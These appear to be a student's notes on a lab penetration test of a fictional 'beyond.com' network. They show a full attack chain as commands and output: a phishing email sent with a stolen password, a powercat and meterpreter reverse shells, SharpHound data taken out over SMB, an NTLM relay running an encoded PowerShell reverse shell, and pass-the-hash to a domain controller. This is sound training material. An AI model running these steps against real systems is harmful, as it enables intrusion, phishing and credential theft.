# Setting up a basic directory structure for the assessment
kali@kali:~$ mkdir beyond
kali@kali:~$ cd beyond
kali@kali:~/beyond$ mkdir mailsrv1
kali@kali:~/beyond$ mkdir websrv1
kali@kali:~/beyond$ touch creds.txt
Documenting our findings is a crucial process for every penetration test. For this Module, we'll store results in the basic work environment we just set up. However, Markdown editors, such as Obsidian, have become quite popular for documenting findings and data in real assessments as they are application-independent and contain functions that will simplify report writing and collaboration.
Beginning with a port scan:
# We'll use -sV to enable service and version detection as well as -sC to use Nmap's default scripts. In addition, we'll enter -oN to create an output file containing the scan results.
kali@kali:~/beyond$ sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 08:53 EDT
Nmap scan report for 192.168.50.242
Host is up (0.11s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: IMAP4 CHILDREN OK ACL IMAP4rev1 completed CAPABILITY NAMESPACE IDLE RIGHTS=texkA0001 SORT QUOTA
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
Service Info: Host: MAILSRV1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-09-29T12:54:00
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: 21s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.95 seconds
In a real penetration test, we would also use passive information gathering techniques such as Google Dorks and leaked password databases to obtain additional information. This would potentially provide us with usernames, passwords, and sensitive information.
Even if we had found a vulnerability with a matching exploit providing the code execution, we should not skip the remaining enumeration steps. While we may get access to the target system, we could potentially miss out on vital data or information for other services and systems.
Trying to bust some directories:
# We'll enter dir to use directory enumeration mode, -u for the URL, -w for a wordlist, and -x for file types we want to identify. For this example, we'll enter txt, pdf, and config to identify potential documents or configuration files. In addition, we'll use -o to create an output file.
kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.242
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,pdf,config
[+] Timeout: 10s
===============================================================
2022/09/29 11:12:27 Starting gobuster in directory enumeration mode
===============================================================
===============================================================
2022/09/29 11:16:00 Finished
===============================================================
Not every enumeration technique needs to provide actionable results. In the initial information gathering phase, it is important to perform a variety of enumeration methods to get a complete picture of a system.
WEBSRV1
In a real penetration test, we could scan MAILSRV1 and WEBSRV1 in a parallel fashion. Meaning, that we could perform the scans at the same time to save valuable time for the client. If we do so, it's vital to perform the scans in a structured way to not mix up results or miss findings.
Nmap scanning new target:
kali@kali:~/beyond$ sudo nmap -sC -sV -oN websrv1/nmap 192.168.50.244
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 11:18 EDT
Nmap scan report for 192.168.50.244
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4f:c8:5e:cd:62:a0:78:b4:6e:d8:dd:0e:0b:8b:3a:4c (ECDSA)
|_ 256 8d:6d:ff:a4:98:57:82:95:32:82:64:53:b2:d7:be:44 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-title: BEYOND Finances – We provide financial freedom
|_Requested resource was http://192.168.50.244/main/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-generator: WordPress 6.0.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.51 seconds
Using whatweb to determine the technology stack of the webpage:
Using wpscan to enumerate wordpress vulnerabilities:
# To perform the scan without an API key, we'll provide the URL of the target for --url, set the plugin detection to aggressive, and specify to enumerate all popular plugins by entering p as an argument to --enumerate. In addition, we'll use -o to create an output file.
kali@kali:~/beyond$ wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
kali@kali:~/beyond$ cat websrv1/wpscan
...
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.50.244/wp-content/plugins/akismet/
| Latest Version: 5.0
| Last Updated: 2022-07-26T16:13:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.50.244/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.
[+] classic-editor
| Location: http://192.168.50.244/wp-content/plugins/classic-editor/
| Latest Version: 1.6.2
| Last Updated: 2021-07-21T22:08:00.000Z
...
[+] contact-form-7
| Location: http://192.168.50.244/wp-content/plugins/contact-form-7/
| Latest Version: 5.6.3 (up to date)
| Last Updated: 2022-09-01T08:48:00.000Z
...
[+] duplicator
| Location: http://192.168.50.244/wp-content/plugins/duplicator/
| Last Updated: 2022-09-24T17:57:00.000Z
| Readme: http://192.168.50.244/wp-content/plugins/duplicator/readme.txt
| [!] The version is out of date, the latest version is 1.5.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.50.244/wp-content/plugins/duplicator/, status: 403
|
| Version: 1.3.26 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.50.244/wp-content/plugins/duplicator/readme.txt
[+] elementor
| Location: http://192.168.50.244/wp-content/plugins/elementor/
| Latest Version: 3.7.7 (up to date)
| Last Updated: 2022-09-20T14:51:00.000Z
...
[+] wordpress-seo
| Location: http://192.168.50.244/wp-content/plugins/wordpress-seo/
| Latest Version: 19.7.1 (up to date)
| Last Updated: 2022-09-20T14:10:00.000Z
...
Using searchsploit to search for vulnerabilities in plugins discovered, staring with the outdated duplicator plugin:
This shows that john has valid credentials to MAILSRV1, we've identified the domain name as beyond.com and reviewing nmap shows there likely aren't any services we can utilize our validated credentials on.
This leave us with two options:
1. Further enumerate SMB on MAILSRV1, checking for sensitive data on accessible shares.
2. Prepare a malicious attachment and send a phishing email as john to daniela and marcus.
Copying powercat to our current directory, hosting it via python as well as starting a netcat listener:
kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~/beyond$ python3 -m http.server 8000 &
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
kali@kali:~/beyond$ nc -nvlp 4444 &
listening on [any] 4444 ...
Using swaks to send the email:
# Creating the body in body.txt
kali@kali:~/beyond$ cat body.txt
Hey!
I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.
On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!
John
# Now we are ready to build the swaks command to send the emails. We'll provide daniela@beyond.com and marcus@beyond.com as recipients of the email to -t, john@beyond.com as name on the email envelope (sender) to --from, and the Windows Library file to --attach. Next, we'll enter --suppress-data to summarize information regarding the SMTP transactions. For the email subject and body, we'll provide Subject: Staging Script to --header and body.txt to --body. In addition, we'll enter the IP address of MAILSRV1 for --server. Finally, we'll add -ap to enable password authentication.
kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john
Password: dqsTwTpZPn#nL
=== Trying 192.168.50.242:25...
=== Connected to 192.168.50.242.
<- 220 MAILSRV1 ESMTP
-> EHLO kali
<- 250-MAILSRV1
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> AUTH LOGIN
<- 334 VXNlcm5hbWU6
-> am9obg==
<- 334 UGFzc3dvcmQ6
-> ZHFzVHdUcFpQbiNuTA==
<- 235 authenticated.
-> MAIL FROM:<john@beyond.com>
<- 250 OK
-> RCPT TO:<marcus@beyond.com>
<- 250 OK
-> DATA
<- 354 OK, send.
-> 36 lines sent
<- 250 Queued (1.088 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
Waiting a few moments...
listening on [any] 4444 ...
connect to [192.168.119.5] from (UNKNOWN) [192.168.50.242] 64264
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami
whoami
beyond\marcus
PS C:\Windows\System32\WindowsPowerShell\v1.0> hostname
hostname
CLIENTWK1
PS C:\Windows\System32\WindowsPowerShell\v1.0> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.6.243
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.6.254
PS C:\Windows\System32\WindowsPowerShell\v1.0>
WinPEAS is not always correct, validate information when you can:
// Result from winPEAS
���������� Basic System Information
� Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
Hostname: CLIENTWK1
Domain Name: beyond.com
ProductName: Windows 10 Pro
EditionID: Professional
// Result from systeminfo
PS C:\Users\marcus> systeminfo
systeminfo
Host Name: CLIENTWK1
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22000 N/A Build 22000
Using the network information and known hosts to update our computers.txt:
���������� Network Ifaces and known hosts
� The masks are only for the IPv4 addresses
Ethernet0[00:50:56:8A:0F:27]: 172.16.6.243 / 255.255.255.0
Gateways: 172.16.6.254
DNSs: 172.16.6.240
Known hosts:
169.254.255.255 00-00-00-00-00-00 Invalid
172.16.6.240 00-50-56-8A-08-34 Dynamic
172.16.6.254 00-50-56-8A-DA-71 Dynamic
172.16.6.255 FF-FF-FF-FF-FF-FF Static
...
���������� DNS cached --limit 70--
Entry Name Data
dcsrv1.beyond.com DCSRV1.beyond.com 172.16.6.240
mailsrv1.beyond.com mailsrv1.beyond.com 172.16.6.254
kali@kali:~/beyond$ cat computer.txt
172.16.6.240 - DCSRV1.BEYOND.COM
-> Domain Controller
172.16.6.254 - MAILSRV1.BEYOND.COM
-> Mail Server
-> Dual Homed Host (External IP: 192.168.50.242)
172.16.6.243 - CLIENTWK1.BEYOND.COM
-> User _marcus_ fetches emails on this machine
No privilege escalation vector found, moving on to enumerating the AD environment and its objects.
PS C:\Users\marcus> iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1
iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1
PS C:\Users\marcus> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\marcus> . .\SharpHound.ps1
. .\SharpHound.ps1
PS C:\Users\marcus> Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All
2022-10-10T07:24:34.3593616-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-10-10T07:24:34.5781410-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-10-10T07:24:34.5937984-07:00|INFORMATION|Initializing SharpHound at 7:24 AM on 10/10/2022
2022-10-10T07:24:35.0781142-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-10-10T07:24:35.3281888-07:00|INFORMATION|Beginning LDAP search for beyond.com
2022-10-10T07:24:35.3906114-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-10-10T07:24:35.3906114-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-10-10T07:25:06.1421842-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 92 MB RAM
2022-10-10T07:25:21.6307386-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2022-10-10T07:25:21.6932468-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2022-10-10T07:25:21.8338601-07:00|INFORMATION|Status: 98 objects finished (+98 2.130435)/s -- Using 103 MB RAM
2022-10-10T07:25:21.8338601-07:00|INFORMATION|Enumeration finished in 00:00:46.5180822
2022-10-10T07:25:21.9414294-07:00|INFORMATION|Saving cache with stats: 57 ID to type mappings.
58 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-10-10T07:25:21.9570748-07:00|INFORMATION|SharpHound Enumeration Completed at 7:25 AM on 10/10/2022! Happy Graphing!
Listing files to locate the zip archive with our enumeration results:
PS C:\Users\marcus> dir
dir
Directory: C:\Users\marcus
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/29/2022 1:49 AM Contacts
d-r--- 9/29/2022 1:49 AM Desktop
d-r--- 9/29/2022 4:37 AM Documents
d-r--- 9/29/2022 4:33 AM Downloads
d-r--- 9/29/2022 1:49 AM Favorites
d-r--- 9/29/2022 1:49 AM Links
d-r--- 9/29/2022 1:49 AM Music
d-r--- 9/29/2022 1:50 AM OneDrive
d-r--- 9/29/2022 1:50 AM Pictures
d-r--- 9/29/2022 1:49 AM Saved Games
d-r--- 9/29/2022 1:50 AM Searches
d-r--- 9/29/2022 4:30 AM Videos
-a---- 10/10/2022 7:25 AM 11995 20221010072521_BloodHound.zip
-a---- 10/10/2022 7:23 AM 1318097 SharpHound.ps1
-a---- 10/10/2022 5:02 AM 1936384 winPEAS.exe
-a---- 10/10/2022 7:25 AM 8703 Zjc5OGNlNTktMzQ0Ni00YThkLWEzZjEtNWNhZGJlNzdmODZl.bin
Starting an SMB server on our kali device to transfer the file:
kali@kali:~/Downloads$ sudo impacket-smbserver test . -smb2support -username test -password test
Copying the .zip over:
PS C:\Users\marcus> net use m: \\192.168.119.5\test /user:test test
The command completed successfully.
PS C:\Users\marcus> copy 20221010072521_BloodHound.zip m:\
Clicking on each object shown will display information about the object:
DCSRV1.BEYOND.COM - Windows Server 2022 Standard
INTERNALSRV1.BEYOND.COM - Windows Server 2022 Standard
MAILSRV1.BEYOND.COM - Windows Server 2022 Standard
CLIENTWK1.BEYOND.COM - Windows 11 Pro
A new host was discovered, let's use nslookup to find its IP address:
We could have also used PowerView or LDAP queries to obtain all of this information. However, in most penetration tests, we want to use BloodHound first as the output of the other methods can be quite overwhelming. It's an effective and powerful tool to gain a deeper understanding of the Active Directory environment in a short amount of time. We can also use raw or pre-built queries to identify highly complex attack vectors and display them in an interactive graphical view.
Services and Sessions
Cypher is a querynig language, so we can build a relationship query with the following syntax (NODES) - [:RELATIONSHIP] -> (NODES).
In our example, we'll query for active sessions on computers by users:
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
We see Beccy, a domain admin, has an active session on MAILSRV1. We may be able to extract their NTLM hash if we get privileged access on MAILSRV1. BloodHound uses SIDs to represent local accounts, in this case the RID 500 implies there is an active session of the local Administrator on INTERNALSRV1.
Now we'll identify all kerberoastable users in the domain with the List all Kerberoastable Accounts pre-built query in BloodHound.
The krbtgt user account acts as service account for the Key Distribution Center (KDC) and is responsible for encrypting and signing Kerberos tickets. When a domain is set up, a password is randomly generated for this user account, making a password attack unfeasible. Therefore, we can often safely skip krbtgt in the context of Kerberoasting.
Even though we've found the SPN for daniela indicating a web server is running on INTERNALSRV1, we should collect all information, prioritize it, and then perform potential attacks.
Creating a staged meterpreter TCP reverse shell as an executable:
kali@kali:~/beyond$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.5 LPORT=443 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: met.exe
Starting a multi/handler listener with corresponding settings with ExitOnSession set to false so we don't need to restart the listener every time:
kali@kali:~/beyond$ sudo msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.119.5
LHOST => 192.168.119.5
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started HTTPS reverse handler on https://192.168.119.5:443
Downloading met.exe on CLIENTWK1 so we get our session:
Catching our session and using multi/manage/autoroute and auxiliary/server/socks_proxy to create a SOCKS5 proxy toa ccess the internal network from our Kali box:
[*] Meterpreter session 1 opened (192.168.119.5:443 -> 192.168.50.242:64234) at 2022-10-11 07:05:22 -0400
msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against CLIENTWK1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.6.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 2.
Update our /etc/proxychains4.conf to use the correct settings:
CrackMapExec version 5.4.0 may throw the error The NETBIOS connection with the remote host is timed out for DCSRV1 or doesn't provide any output at all. Version 5.4.1 contains a fix to address this issue.
Because MAILSRV1 and INTERNALSRV1 have SMB signing set to False, we may be able to perform relay attacks if we can force an authentication request.
Performing an nmap scan on the targets. We must specify -sT to perform a TCP scan, otherwise Nmap will not work over Proxychains:
kali@kali:~/beyond$ sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-11 07:17 EDT
Nmap scan report for 172.16.6.240
Host is up (2.2s latency).
PORT STATE SERVICE
21/tcp closed ftp
80/tcp closed http
443/tcp closed https
Nmap scan report for internalsrv1.beyond.com (172.16.6.241)
Host is up (0.21s latency).
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
443/tcp open https
Nmap scan report for 172.16.6.254
Host is up (0.20s latency).
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
443/tcp closed https
Nmap done: 3 IP addresses (3 hosts up) scanned in 14.34 seconds
Use chisel v1.7.7 (go1.17.6). Future versions have weird issues.
Using chisel to tunnel our traffic through CLIENTWK1 to INTERNALSRV1:
I ran into several issues with chisel here. In my case, I just stopped using it and resorted to proxychains firefox & and went directly to http://172.16.6.241
With chisel connected, we can now browse to port 80 on 172.16.6.241 via port 80 on our Kali machine (127.0.0.1) by using Firefox:
Attempting to browse to http://127.0.0.1/wordpress/wp-admin results in an Unable to connect error due to name resolution for the internal server. Adding it to our hosts file will help here:
kali@kali:~/beyond$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
...
127.0.0.1 internalsrv1.beyond.com
# In my case it was:
# 172.16.6.241 internalsrv1.beyond.com
...
Now we can properly get to the Administrator login page of Wordpress on INTERNALSRV1. Trying our current collection of credentials fails to get us in as well as common passwords like admin:admin.
Attacking an Internal Web Application
Speak Kerberoast and Enter
Moving onto kerberoasting using our one set of valid credentials:
With the cracked password, let's try and login to WordPress at /wp-admin via our forwarded port:
🎉 We're in! 🎉
Abuse a WordPress Plugin for a Relay Attack
First let's gather information in WordPress, starting with configured users:
Checking out the only enabled plugin:
Potential attack vectors:
Attempt to upload a malicious WordPress plugin. Web shell or reverse shell.
Attempt to force an authentication via the Backup directory path for a relay attack due to SMB signing being disabled.
Because the second vector results in code execution and provides a potential vector to achieve a goal of the penetration test, we'll attempt this one first.
kali@kali:~/beyond$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.242 -c "powershell -enc JABjAGwAaQ..."
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Setting up our reverse shell listener:
kali@kali:~/beyond$ nc -nvlp 9999
listening on [any] 9999 ...
Save the modified directory path by scrolling down and clicking on Save. This should cause the WordPress plugin to authenticate to our ntlmrelay.
...
[*] Authenticating against smb://192.168.50.242 as INTERNALSRV1/ADMINISTRATOR SUCCEED
...
[*] Service RemoteRegistry is in stopped state
...
[*] Starting service RemoteRegistry
...
[*] Executed specified command on host: 192.168.50.242
...
[*] Stopping service RemoteRegistry
We now see the reverse shell connection:
connect to [192.168.119.5] from (UNKNOWN) [192.168.50.242] 50063
whoami
nt authority\system
PS C:\Windows\system32> hostname
MAILSRV1
PS C:\Windows\system32>
Interacting with the session and spawning a new powershell command line shell:
msf6 post(multi/manage/autoroute) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\Administrator>
We got beccy's (a domain admin) password! Time to get over to the DC.
Lateral Movement
Because we have the clear text password and NTLM hash for beccy, we can use impacket-psexec to get an interactive shell on DCSRV1. We could use either of these, in this example we use the hash:
kali@kali:~$ proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.6.240
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 172.16.6.240.....
[*] Found writable share ADMIN$
[*] Uploading file CGOrpfCz.exe
[*] Opening SVCManager on 172.16.6.240.....
[*] Creating service tahE on 172.16.6.240.....
[*] Starting service tahE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DCSRV1
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.6.240
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.6.254
Penetration test complete! Time to write a report!
Setting up impacket-ntlmrelayx. We'll use --no-http-server and -smb2support to disable the HTTP server and enable SMB2 support. We'll specify the external address for MAILSRV1, 192.168.50.242, as target for the relay attack. By entering the external address, we don't have to proxy our relay attack via Proxychains. Finally, we'll base64-encode a PowerShell reverse shell that will connect back to our Kali machine on port 9999 and provide it as a command to -c:
